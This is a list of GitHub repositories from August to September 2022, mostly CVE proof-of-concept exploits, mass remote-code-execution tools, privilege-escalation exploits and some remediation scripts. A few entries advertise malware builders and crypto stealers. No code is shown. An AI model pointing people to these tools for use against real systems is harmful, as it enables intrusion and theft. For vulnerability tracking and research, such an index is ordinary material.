**no description** : [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2022-20347) create time: 2022-09-16T09:59:04Z

**cve-2010-2553复现** : [Sunqiz/cve-2010-2553-reproduction](https://github.com/Sunqiz/cve-2010-2553-reproduction) create time: 2022-09-16T08:51:40Z

**CVE-2012-0003复现** : [Sunqiz/CVE-2012-0003-reproduction](https://github.com/Sunqiz/CVE-2012-0003-reproduction) create time: 2022-09-16T08:59:43Z

**Unauthenticated Remote Code Execution in DrayTek Vigor. CVE-2022-32548** : [Administrative2022/CVE-2022-32548-MASS-RCE](https://github.com/Administrative2022/CVE-2022-32548-MASS-RCE) create time: 2022-09-16T08:48:40Z

**CVE-2022-37210 POC** : [AgainstTheLight/CVE-2022-37210](https://github.com/AgainstTheLight/CVE-2022-37210) create time: 2022-09-16T08:17:56Z

**CVE-2022-37209 POC** : [AgainstTheLight/CVE-2022-37209](https://github.com/AgainstTheLight/CVE-2022-37209) create time: 2022-09-16T08:15:13Z

**PoC for CVE-2022-34729** : [Pwnrin/CVE-2022-34729](https://github.com/Pwnrin/CVE-2022-34729) create time: 2022-09-16T06:07:04Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [rftg1000/CVE-2022-32548-POC-RCE](https://github.com/rftg1000/CVE-2022-32548-POC-RCE) create time: 2022-09-15T17:21:39Z

**no description** : [kernel-cyber/CVE-2009-4623](https://github.com/kernel-cyber/CVE-2009-4623) create time: 2022-09-15T15:38:30Z

**Proof of concept for CVE-2022-30190 (Follina).** : [winstxnhdw/CVE-2022-30190](https://github.com/winstxnhdw/CVE-2022-30190) create time: 2022-09-15T16:12:57Z

**no description** : [stealthcopter/CVE-2022-39841](https://github.com/stealthcopter/CVE-2022-39841) create time: 2022-09-05T12:54:26Z

**no description** : [mightysai1997/CVE-2021-41773S](https://github.com/mightysai1997/CVE-2021-41773S) create time: 2022-09-15T14:17:45Z

**no description** : [mightysai1997/CVE-2021-41773m](https://github.com/mightysai1997/CVE-2021-41773m) create time: 2022-09-15T12:37:59Z

**no description** : [mightysai1997/CVE-2021-41773.git1](https://github.com/mightysai1997/CVE-2021-41773.git1) create time: 2022-09-15T12:35:06Z

**no description** : [mightysai1997/cve-2021-42013.get](https://github.com/mightysai1997/cve-2021-42013.get) create time: 2022-09-15T12:15:00Z

**no description** : [mightysai1997/cve-2021-42013L](https://github.com/mightysai1997/cve-2021-42013L) create time: 2022-09-15T11:35:00Z

**no description** : [mightysai1997/cve-2021-42013](https://github.com/mightysai1997/cve-2021-42013) create time: 2022-09-15T11:28:39Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [rftg1000/CVE-2022-32548-MASS-RCE](https://github.com/rftg1000/CVE-2022-32548-MASS-RCE) create time: 2022-09-15T11:31:04Z

**no description** : [mightysai1997/CVE-2021-41773-PoC](https://github.com/mightysai1997/CVE-2021-41773-PoC) create time: 2022-09-15T11:01:45Z

**no description** : [nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-14463](https://github.com/nidhi7598/external_tcpdump-4.9.2_AOSP_10_r33_CVE-2018-14463) create time: 2022-09-15T10:21:14Z

**no description** : [mightysai1997/CVE-2021-41773-L-](https://github.com/mightysai1997/CVE-2021-41773-L-) create time: 2022-09-15T10:08:36Z

**no description** : [mightysai1997/CVE-2021-41773-i-](https://github.com/mightysai1997/CVE-2021-41773-i-) create time: 2022-09-15T09:38:04Z

**no description** : [mightysai1997/cve-2021-41773-v-](https://github.com/mightysai1997/cve-2021-41773-v-) create time: 2022-09-15T09:36:17Z

**no description** : [mightysai1997/CVE-2021-41773h](https://github.com/mightysai1997/CVE-2021-41773h) create time: 2022-09-15T09:27:04Z

**CVE-2022-37208** : [AgainstTheLight/CVE-2022-37208](https://github.com/AgainstTheLight/CVE-2022-37208) create time: 2022-09-15T09:55:49Z

**CVE-2022-37207 POC** : [AgainstTheLight/CVE-2022-37207](https://github.com/AgainstTheLight/CVE-2022-37207) create time: 2022-09-15T09:53:06Z

**CVE-2022-37206 POC** : [AgainstTheLight/CVE-2022-37206](https://github.com/AgainstTheLight/CVE-2022-37206) create time: 2022-09-15T09:48:18Z

**CVE-2022-37205 POC** : [AgainstTheLight/CVE-2022-37205](https://github.com/AgainstTheLight/CVE-2022-37205) create time: 2022-09-15T09:46:06Z

**CVE-2022-37204 POC** : [AgainstTheLight/CVE-2022-37204](https://github.com/AgainstTheLight/CVE-2022-37204) create time: 2022-09-15T09:43:39Z

**CVE-2022-37203 POC** : [AgainstTheLight/CVE-2022-37203](https://github.com/AgainstTheLight/CVE-2022-37203) create time: 2022-09-15T09:38:52Z

**CVE-2022-37202 POC** : [AgainstTheLight/CVE-2022-37202](https://github.com/AgainstTheLight/CVE-2022-37202) create time: 2022-09-15T09:29:39Z

**no description** : [mightysai1997/cve-2021-41773](https://github.com/mightysai1997/cve-2021-41773) create time: 2022-09-15T09:08:58Z

**CVE-2022-37201 POC** : [AgainstTheLight/CVE-2022-37201](https://github.com/AgainstTheLight/CVE-2022-37201) create time: 2022-09-15T09:21:30Z

**no description** : [nidhi7598/external_tcpdump_AOSP_10_r33_CVE-2018-14463](https://github.com/nidhi7598/external_tcpdump_AOSP_10_r33_CVE-2018-14463) create time: 2022-09-15T08:03:36Z

**Minimal PoC for CVE-2022-29856** : [Flo451/CVE-2022-29856-PoC](https://github.com/Flo451/CVE-2022-29856-PoC) create time: 2022-09-15T08:29:15Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [rftg1000/CVE-2022-32548-RCE](https://github.com/rftg1000/CVE-2022-32548-RCE) create time: 2022-09-15T05:39:42Z

**ZeroLogon exploitation script,One-click recovery of domain controller machine Hash** : [zha0/CVE-2020-1474](https://github.com/zha0/CVE-2020-1474) create time: 2022-09-01T14:40:28Z

**CVE-2022-2546 explained** : [0xvinix/CVE-2022-2546](https://github.com/0xvinix/CVE-2022-2546) create time: 2022-09-14T19:03:43Z

**HIP2022 presentation materials.** : [EgeBalci/CVE-2022-29154](https://github.com/EgeBalci/CVE-2022-29154) create time: 2022-09-14T13:59:21Z

**no description** : [ProxyStaffy/Airties-CVE-2022-38789](https://github.com/ProxyStaffy/Airties-CVE-2022-38789) create time: 2022-09-14T12:43:05Z

**no description** : [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2022-20347) create time: 2022-09-14T12:06:24Z

**Unauthenticated Remote Code Execution in DrayTek Vigor. CVE-2022-32548** : [Administrative2022/CVE-2022-32548-RCE](https://github.com/Administrative2022/CVE-2022-32548-RCE) create time: 2022-09-14T10:51:42Z

**Exploit code for CVE-2021-1961** : [tamirzb/CVE-2021-1961](https://github.com/tamirzb/CVE-2021-1961) create time: 2022-09-03T13:31:13Z

**no description** : [nidhi7598/external_zlib-1.2.11_AOSP_10_r33_CVE-2022-37434](https://github.com/nidhi7598/external_zlib-1.2.11_AOSP_10_r33_CVE-2022-37434) create time: 2022-09-14T07:28:23Z

**no description** : [trhacknon/CVE-2020-8515-PoC](https://github.com/trhacknon/CVE-2020-8515-PoC) create time: 2022-09-14T04:28:51Z

**no description** : [trhacknon/CVE-2020-8515](https://github.com/trhacknon/CVE-2020-8515) create time: 2022-09-14T04:25:09Z

**Free MP3 CD Ripper 2.6 版本中存在栈缓冲区溢出漏洞 (CVE-2019-9766),远程攻击者可借助特制的 .mp3 文件利用该漏洞执行任意代码。** : [zeronohacker/CVE-2019-9766](https://github.com/zeronohacker/CVE-2019-9766) create time: 2022-09-14T02:19:57Z

**Automation to validate the impact of the vulnerability CVE-2022-1292 on a specific system.** : [und3sc0n0c1d0/CVE-2022-1292](https://github.com/und3sc0n0c1d0/CVE-2022-1292) create time: 2022-09-13T22:01:05Z

**Amanda Information Disclosure bug.** : [MaherAzzouzi/CVE-2022-37703](https://github.com/MaherAzzouzi/CVE-2022-37703) create time: 2022-09-13T19:26:38Z

**small writeup on EnterpriseModernAppManager::ProvisionApplication bug** : [Wack0/CVE-2022-35841](https://github.com/Wack0/CVE-2022-35841) create time: 2022-09-13T17:53:56Z

**no description** : [bl4ck574r/CVE-2019-17662](https://github.com/bl4ck574r/CVE-2019-17662) create time: 2022-09-13T09:53:45Z

**CVE-2022-34715-POC pcap** : [Starssgo/CVE-2022-34715-POC](https://github.com/Starssgo/CVE-2022-34715-POC) create time: 2022-09-13T08:33:03Z

**ApacheSolrRCE(CVE-2019-0193)一键写shell,原理是通过代码执行的java文件流写的马。** : [jdr2021/ApacheSolrRCE](https://github.com/jdr2021/ApacheSolrRCE) create time: 2022-09-13T08:02:20Z

**A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)** : [MaherAzzouzi/CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit) create time: 2022-09-12T19:22:44Z

**no description** : [nidhi7598/system_bt_AOSP_10_r33_CVE-2022-20361](https://github.com/nidhi7598/system_bt_AOSP_10_r33_CVE-2022-20361) create time: 2022-09-12T11:10:15Z

**DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field** : [rftg1000/CVE-2022-32548-RCE-POC](https://github.com/rftg1000/CVE-2022-32548-RCE-POC) create time: 2022-09-12T09:31:26Z

**CVE-2022-27925 nuclei template** : [akincibor/CVE-2022-27925](https://github.com/akincibor/CVE-2022-27925) create time: 2022-09-12T08:30:30Z

**no description** : [nidhi7598/frameworks_native_AOSP_10_r33_CVE-2022-20344](https://github.com/nidhi7598/frameworks_native_AOSP_10_r33_CVE-2022-20344) create time: 2022-09-12T07:53:33Z

**no description** : [M4fiaB0y/CVE-2022-30075](https://github.com/M4fiaB0y/CVE-2022-30075) create time: 2022-09-12T07:28:13Z

**no description** : [xnyuq/cve-2021-42321](https://github.com/xnyuq/cve-2021-42321) create time: 2022-09-12T05:13:40Z

**SmarterMail 16.x Exploit** : [secunnix/CVE-2019-7213](https://github.com/secunnix/CVE-2019-7213) create time: 2022-09-11T21:01:53Z

**CVE-2022-0847(Dirty Pipe) vulnerability exploits.** : [Gustavo-Nogueira/Dirty-Pipe-Exploits](https://github.com/Gustavo-Nogueira/Dirty-Pipe-Exploits) create time: 2022-09-11T19:50:53Z

**DrayTek Vigor Exploit** : [Expl0desploit/CVE-2022-32548](https://github.com/Expl0desploit/CVE-2022-32548) create time: 2022-09-11T16:24:25Z

**Unauthenticated Blind Command injection in the enable_user function of DroboAccess v 2.1** : [RevoCain/CVE-2018-14699](https://github.com/RevoCain/CVE-2018-14699) create time: 2022-09-10T20:11:08Z

**metasploit and python(Multi and single target) module for CVE-2022-26809 windows rpc rce via smb 445** : [Ziggy78/CVE-2022-26809-RCE-MASS](https://github.com/Ziggy78/CVE-2022-26809-RCE-MASS) create time: 2022-09-11T14:41:10Z

**Write-up for Sekhmet HackTheBox, CVE-2022-3506, Active Directory Exploitation** : [hackthebox-writeups/Sekhmet-HackTheBox-Writeup](https://github.com/hackthebox-writeups/Sekhmet-HackTheBox-Writeup) create time: 2022-09-10T20:27:55Z

**no description** : [Pwnrin/CVE-2022-30206](https://github.com/Pwnrin/CVE-2022-30206) create time: 2022-09-10T13:44:40Z

**Unauthicated RCE for open-web-analytics(1.7.3)** : [garySec/CVE-2022-24637](https://github.com/garySec/CVE-2022-24637) create time: 2022-09-10T09:11:44Z

**A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances.** : [CEOrbey/CVE-2022-36804-MASS-RCE](https://github.com/CEOrbey/CVE-2022-36804-MASS-RCE) create time: 2022-09-10T08:51:08Z

**PhpMyAdmin 4.0.x—4.6.2 Remote Code Execution Vulnerability (CVE-2016-5734)** : [miko550/CVE-2016-5734-docker](https://github.com/miko550/CVE-2016-5734-docker) create time: 2022-09-10T03:12:41Z

**CVE-2021-38163 - exploit for SAP Netveawer** : [core1impact/CVE-2021-38163](https://github.com/core1impact/CVE-2021-38163) create time: 2022-09-10T03:41:52Z

**Primefaces 5.X EL Injection Exploit (CVE-2017-1000486)** : [oppsec/pwnfaces](https://github.com/oppsec/pwnfaces) create time: 2022-09-09T23:09:40Z

**CVE-2022-22629 Proof of Concept** : [parsdefense/CVE-2022-22629](https://github.com/parsdefense/CVE-2022-22629) create time: 2022-09-09T17:21:27Z

**no description** : [izdiwho/CVE-2022-40317](https://github.com/izdiwho/CVE-2022-40317) create time: 2022-09-09T15:27:12Z

**Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue/compromised adb daemons during an adb pull operation.** : [irsl/CVE-2022-20128](https://github.com/irsl/CVE-2022-20128) create time: 2022-09-09T12:40:21Z

**Proof of concept code to exploit flaw in adb that allowed opening network connections on the host to arbitrary destinations** : [irsl/CVE-2022-3168-adb-unexpected-reverse-forwards](https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forwards) create time: 2022-09-09T12:31:56Z

**CVE-2022-40297 - Proof of Concept: Privilage escalation in Ubuntu Touch 16.04 - by PIN Bruteforce** : [filipkarc/PoC-ubuntutouch-pin-privesc](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc) create time: 2022-09-04T13:05:58Z

**[CVE-2014-6271] Apache Shellshock Remote Command Injection tool for quick reverse shell and file browsing** : [FilipStudeny/-CVE-2014-6271-Shellshock-Remote-Command-Injection-](https://github.com/FilipStudeny/-CVE-2014-6271-Shellshock-Remote-Command-Injection-) create time: 2022-09-09T10:44:25Z

**CVE-2022-31188 - OpenCV CVAT (Computer Vision Annotation Tool) SSRF** : [emirpolatt/CVE-2022-31188](https://github.com/emirpolatt/CVE-2022-31188) create time: 2022-09-09T10:36:59Z

**CVE-2022-36446 - Webmin 1.996 Remote Code Execution** : [emirpolatt/CVE-2022-36446](https://github.com/emirpolatt/CVE-2022-36446) create time: 2022-09-09T10:34:53Z

**no description** : [nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360) create time: 2022-09-09T06:09:15Z

**no description** : [coco0x0a/CTF_CVE-2022-34265](https://github.com/coco0x0a/CTF_CVE-2022-34265) create time: 2022-09-08T21:22:28Z

**no description** : [coco0x0a/CTF_CVE-2022-34265](https://github.com/coco0x0a/CTF_CVE-2022-34265) create time: 2022-09-08T18:34:54Z

**no description** : [coco0x0a/CVE-2022-34265-mysql](https://github.com/coco0x0a/CVE-2022-34265-mysql) create time: 2022-09-08T14:15:03Z

**no description** : [Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126](https://github.com/Trinadh465/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126) create time: 2022-09-08T10:51:13Z

**ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack** : [santokum/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack](https://github.com/santokum/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack) create time: 2022-09-08T09:04:27Z

**CVE-2021-38314 Python Exploit** : [akhilkoradiya/CVE-2021-38314](https://github.com/akhilkoradiya/CVE-2021-38314) create time: 2022-09-08T09:08:48Z

**no description** : [nidhi7598/system_bt_AOSP_10_r33_CVE-2021-39674](https://github.com/nidhi7598/system_bt_AOSP_10_r33_CVE-2021-39674) create time: 2022-09-08T06:53:02Z

**This powershell script is intended to be used by anyone looking to remediate the Log4j Vulnerability within their environment. It can target multiple machines and run remotely as a job on all or only affected devices.** : [digital-dev/Log4j-CVE-2021-44228-Remediation](https://github.com/digital-dev/Log4j-CVE-2021-44228-Remediation) create time: 2022-09-08T00:22:57Z

**The issue is due to the fact that when installing a package, Golang will build native extensions. This can be used to pass additional flags to the compiler to gain code execution. For example, CFLAGS can be used.** : [hasharmujahid/CVE-2018-6574-go-get-RCE](https://github.com/hasharmujahid/CVE-2018-6574-go-get-RCE) create time: 2022-09-07T18:09:38Z

**Insecure Permissions WeDayCare** : [Fopje/CVE-2022-36539](https://github.com/Fopje/CVE-2022-36539) create time: 2022-09-07T07:58:08Z

**CVE-2022-2639 Linux kernel openvswitch local privilege escalation** : [avboy1337/CVE-2022-2639-PipeVersion](https://github.com/avboy1337/CVE-2022-2639-PipeVersion) create time: 2022-09-05T15:31:56Z

**ManageEngine PAM360, Password Manager Pro, and Access Manager Plus unauthenticated remote code execution vulnerability PoC** : [viniciuspereiras/CVE-2022-35405](https://github.com/viniciuspereiras/CVE-2022-35405) create time: 2022-07-18T20:52:01Z

**Remediation for CVE-2013-3900** : [snoopopsec/vulnerability-CVE-2013-3900](https://github.com/snoopopsec/vulnerability-CVE-2013-3900) create time: 2022-09-06T16:37:51Z

**CVE-2021-34527 AddPrinterDriverEx() Privilege Escalation** : [hackerhouse-opensource/cve-2021-34527](https://github.com/hackerhouse-opensource/cve-2021-34527) create time: 2022-09-05T23:48:44Z

**no description** : [trhacknon/CVE-2022-24706-CouchDB-Exploit](https://github.com/trhacknon/CVE-2022-24706-CouchDB-Exploit) create time: 2022-09-06T00:17:19Z

**no description** : [s1204IT/CVE-2022-20186_CTXZ](https://github.com/s1204IT/CVE-2022-20186_CTXZ) create time: 2022-09-05T15:26:30Z

**no description** : [s1204-inspect/CVE-2022-20186_CTXZ](https://github.com/s1204-inspect/CVE-2022-20186_CTXZ) create time: 2022-09-05T15:00:13Z

**no description** : [jet-pentest/CVE-2022-39838](https://github.com/jet-pentest/CVE-2022-39838) create time: 2022-09-05T14:21:12Z

**CVE-2022-2639 Linux kernel openvswitch local privilege escalation** : [veritas501/CVE-2022-2639-PipeVersion](https://github.com/veritas501/CVE-2022-2639-PipeVersion) create time: 2022-09-05T14:12:06Z

**Wordpress Vulnerability - XSS ( Cross-Site Scripting )** : [akhilkoradiya/CVE-2022-29455](https://github.com/akhilkoradiya/CVE-2022-29455) create time: 2022-09-05T12:08:50Z

**A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances.** : [CEOrbey/CVE-2022-36804-POC](https://github.com/CEOrbey/CVE-2022-36804-POC) create time: 2022-09-04T17:03:13Z

**cve-2022-9099 test** : [gnaw1ng/cve-2022-9099](https://github.com/gnaw1ng/cve-2022-9099) create time: 2022-09-04T13:15:49Z

**CVE-2022-2586: Linux kernel nft_object UAF** : [aels/CVE-2022-2586-LPE](https://github.com/aels/CVE-2022-2586-LPE) create time: 2022-09-03T19:04:31Z

**Unauthenticated RCE in Laravel Debug Mode <8.4.2** : [JacobEbben/CVE-2021-3129](https://github.com/JacobEbben/CVE-2021-3129) create time: 2022-09-03T15:25:35Z

**Remote Code Execution exploit for CVE-2022-36804 (BitBucket Server and DataCenter).** : [cryptolakk/CVE-2022-36804-RCE](https://github.com/cryptolakk/CVE-2022-36804-RCE) create time: 2022-09-03T14:53:29Z

**no description** : [0xrobiul/CVE-2018-15473](https://github.com/0xrobiul/CVE-2018-15473) create time: 2022-09-03T11:44:12Z

**Zabbix-SAML-Bypass: CVE-2022-23131** : [Vulnmachines/Zabbix-CVE-2022-23131](https://github.com/Vulnmachines/Zabbix-CVE-2022-23131) create time: 2022-09-02T13:24:13Z

**no description** : [Y3A/CVE-2021-31956](https://github.com/Y3A/CVE-2021-31956) create time: 2022-09-02T10:35:11Z

**Black board CMS Escalation of Privileges** : [DayiliWaseem/CVE-2022-39196-](https://github.com/DayiliWaseem/CVE-2022-39196-) create time: 2022-09-02T09:35:35Z

**CVE-2021-31800 POC** : [Louzogh/CVE-2021-31800](https://github.com/Louzogh/CVE-2021-31800) create time: 2022-09-02T09:02:19Z

**iTop < 2.7.6 - (Authenticated) Remote command execution** : [Acceis/exploit-CVE-2022-24780](https://github.com/Acceis/exploit-CVE-2022-24780) create time: 2022-09-02T07:46:36Z

**Powertek PDU身份绕过** : [Henry4E36/CVE-2022-33174](https://github.com/Henry4E36/CVE-2022-33174) create time: 2022-09-02T02:27:31Z

**pwnkit auto exploiter written in Go, no network connectivity required.** : [1337Rin/CVE-2021-4034](https://github.com/1337Rin/CVE-2021-4034) create time: 2022-09-01T22:48:09Z

**PoC for CVE-2022-25260: semi-blind SSRF in JetBrains Hub** : [yuriisanin/CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260) create time: 2022-09-01T21:08:19Z

**Unauthenticated RCE in Open Web Analytics (OWA) 1.7.3** : [Lay0us1/CVE-2022-24637](https://github.com/Lay0us1/CVE-2022-24637) create time: 2022-08-30T17:31:14Z

**no description** : [raheel0x01/CVE-2022-34265-modified](https://github.com/raheel0x01/CVE-2022-34265-modified) create time: 2022-07-09T10:25:48Z

**Redis RCE through Lua Sandbox Escape vulnerability** : [JacobEbben/CVE-2022-0543](https://github.com/JacobEbben/CVE-2022-0543) create time: 2022-09-01T16:44:56Z

**fastjson 1.2.80 CVE-2022-25845** : [hosch3n/FastjsonVulns](https://github.com/hosch3n/FastjsonVulns) create time: 2022-09-01T04:36:50Z

**no description** : [75ACOL/CVE-2022-22963](https://github.com/75ACOL/CVE-2022-22963) create time: 2022-09-01T09:13:59Z

**Metasploit exploit for CVE-2022-30526** : [greek0x0/CVE-2022-30526](https://github.com/greek0x0/CVE-2022-30526) create time: 2022-09-01T07:15:09Z

**OpenSSL** : [greek0x0/CVE-2022-1292](https://github.com/greek0x0/CVE-2022-1292) create time: 2022-09-01T07:00:00Z

**Proof-of-concept exploit for the Dirty Pipe vulnerability (CVE-2022-0847)** : [notl0cal/dpipe](https://github.com/notl0cal/dpipe) create time: 2022-08-31T23:19:28Z

**Casdoor是一个基于OAuth 2.0/OIDC 的中心化的单点登录(SSO)身份验证平台,此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL注入漏洞** : [cukw/CVE-2022-24124_POC](https://github.com/cukw/CVE-2022-24124_POC) create time: 2022-08-31T16:23:16Z

**no description** : [TakenoSite/RemoteUploader-CVE-2021-36260](https://github.com/TakenoSite/RemoteUploader-CVE-2021-36260) create time: 2022-08-28T03:11:00Z

**CVE-2020-1472 C++** : [Rvn0xsy/ZeroLogon](https://github.com/Rvn0xsy/ZeroLogon) create time: 2022-08-31T06:01:02Z

**Unauthenticated RCE in Open Web Analytics (OWA) 1.7.3** : [JacobEbben/CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637) create time: 2022-08-30T16:38:01Z

**Oracle Weblogic RCE - CVE-2022-2109** : [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109) create time: 2022-08-30T11:50:17Z

**CVE-2010-2553-reproduction** : [Sunqiz/CVE-2010-2553-reproduction](https://github.com/Sunqiz/CVE-2010-2553-reproduction) create time: 2022-08-30T09:46:14Z

**no description** : [Deepak983/CVE-2020-19587](https://github.com/Deepak983/CVE-2020-19587) create time: 2022-08-30T10:08:07Z

**Incorrect Access Control issue in Yellowfin Business Intelligence 7.3 allows remote attackers to escalate privilege via MIAdminStyles.i4 Admin UI** : [Deepak983/CVE-2020-19586](https://github.com/Deepak983/CVE-2020-19586) create time: 2022-08-30T10:00:01Z

**repo showcasing generating "psychic signatures for java"** : [davwwwx/CVE-2022-21449](https://github.com/davwwwx/CVE-2022-21449) create time: 2022-08-30T08:12:24Z

**This repository contains a test case for CVE-2020-0796** : [awareseven/eternalghosttest](https://github.com/awareseven/eternalghosttest) create time: 2020-03-12T09:35:57Z

**no description** : [DShankle/VLC_CVE-2021-25804_Analysis](https://github.com/DShankle/VLC_CVE-2021-25804_Analysis) create time: 2022-05-23T20:58:56Z

**no description** : [DShankle/CVE-2022-28381_PoC](https://github.com/DShankle/CVE-2022-28381_PoC) create time: 2022-08-24T20:04:58Z

**no description** : [TakenoSite/Simple-CVE-2021-36260](https://github.com/TakenoSite/Simple-CVE-2021-36260) create time: 2022-08-29T15:21:11Z

**Adobe Acrobat Reader UAF vulnerability Exploit code** : [WonjunChun/CVE-2020-9715](https://github.com/WonjunChun/CVE-2020-9715) create time: 2022-08-29T14:33:40Z

**CVE-2017-8917 - Joomla 3.7.0 'com_fields' SQL Injection** : [Siopy/CVE-2017-8917](https://github.com/Siopy/CVE-2017-8917) create time: 2022-08-29T11:51:00Z

**CVE-2022-36200 PoC** : [afaq1337/CVE-2022-36200](https://github.com/afaq1337/CVE-2022-36200) create time: 2022-08-29T11:03:09Z

**Apache Spark RCE - CVE-2022-33891** : [Vulnmachines/Apache-spark-CVE-2022-33891](https://github.com/Vulnmachines/Apache-spark-CVE-2022-33891) create time: 2022-08-29T08:48:38Z

**CVE-2017-7269 implemented in C#** : [denchief1/CVE-2017-7269](https://github.com/denchief1/CVE-2017-7269) create time: 2022-08-29T03:05:06Z

**CVE-2017-7269 implemented in python3** : [denchief1/CVE-2017-7269_Python3](https://github.com/denchief1/CVE-2017-7269_Python3) create time: 2022-08-28T23:14:02Z

**Based on https://devel0pment.de/?p=2494** : [watchdog2000/cve-2022-24637_open-web-analytics-info-disclosure-to-rce](https://github.com/watchdog2000/cve-2022-24637_open-web-analytics-info-disclosure-to-rce) create time: 2022-08-28T20:30:24Z

**nameko Arbitrary code execution due to YAML deserialization** : [s-index/CVE-2021-41078](https://github.com/s-index/CVE-2021-41078) create time: 2022-08-28T06:42:59Z

**no description** : [jturner786/magento-CVE-2022-24086](https://github.com/jturner786/magento-CVE-2022-24086) create time: 2022-08-28T02:48:05Z

**A Docker image vulnerable to CVE-2020-7246.** : [arafatansari/SecAssignment](https://github.com/arafatansari/SecAssignment) create time: 2022-08-27T19:47:23Z

**CVE-2022-37177 - HireVue-Broken-Or-Risky-Cryptographic-Algorithm** : [JC175/CVE-2022-37177](https://github.com/JC175/CVE-2022-37177) create time: 2022-08-27T15:00:23Z

**Simple checker for CVE-2022-27255 using poc_crash and telnet availability** : [stryker-project/CVE-2022-27255-checker](https://github.com/stryker-project/CVE-2022-27255-checker) create time: 2022-08-27T15:56:44Z

**CVE-2022-0492-Container-Escape** : [yoeelingBin/CVE-2022-0492-Container-Escape](https://github.com/yoeelingBin/CVE-2022-0492-Container-Escape) create time: 2022-08-27T04:02:24Z

**Python Script to exploit Zimbra Auth Bypass + RCE (CVE-2022-27925)** : [Chocapikk/CVE-2022-27925-Revshell](https://github.com/Chocapikk/CVE-2022-27925-Revshell) create time: 2022-08-26T20:19:48Z

**Rust POC for CVE-2018-1932X kernel driver vulnerabilities** : [BKreisel/CVE-2018-1932X](https://github.com/BKreisel/CVE-2018-1932X) create time: 2022-08-26T18:42:13Z

**PoC for vulnerability in Renault ZOE Keyless System(CVE-2022-38766)** : [AUTOCRYPT-IVS-VnV/CVE-2022-38766](https://github.com/AUTOCRYPT-IVS-VnV/CVE-2022-38766) create time: 2022-08-26T08:43:40Z

**Search for BTC coins on earlier versions of Bitcoin Core with critical vulnerability OpenSSL 0.9.8 CVE-2008-0166** : [demining/Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166](https://github.com/demining/Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166) create time: 2022-08-26T12:18:39Z

**no description** : [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20142) create time: 2022-08-26T10:35:11Z

**no description** : [pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/pazhanivel07/frameworks_base_AOSP10_r33_CVE-2022-20007) create time: 2022-08-26T09:25:36Z

**ZeroLogon exploitation script,One-click recovery of domain controller machine Hash** : [lele8/CVE-2020-1472](https://github.com/lele8/CVE-2020-1472) create time: 2022-08-26T09:06:04Z

**Exploit for zerologon cve-2020-1472,And automatically recover the domain control machine hash** : [30579096/CVE-2020-1473](https://github.com/30579096/CVE-2020-1473) create time: 2022-08-08T07:03:59Z

**CVE-2022-26134 web payload** : [1337in/CVE-2022-26134web](https://github.com/1337in/CVE-2022-26134web) create time: 2022-08-26T07:38:29Z

**There is a XSS vulnerability in Artica Proxy 4.30.000000** : [5l1v3r1/CVE-2022-37153](https://github.com/5l1v3r1/CVE-2022-37153) create time: 2022-08-25T08:27:51Z

**no description** : [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416) create time: 2022-08-26T05:44:57Z

**no description** : [nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20007](https://github.com/nidhi7598/frameworks_base_AOSP_10_r33_CVE-2022-20007) create time: 2022-08-26T05:17:14Z

**CVE-2021-25642** : [safe3s/CVE-2021-25642](https://github.com/safe3s/CVE-2021-25642) create time: 2022-08-26T03:51:58Z

**Simple Java Front and Back end with bad log4j version featuring CVE-2021-44228** : [eurogig/jankybank](https://github.com/eurogig/jankybank) create time: 2022-08-25T21:35:32Z

**no description** : [HunnahRcs/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/HunnahRcs/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-08-25T19:00:12Z

**no description** : [HunnahRcs/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/HunnahRcs/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-08-25T18:48:39Z

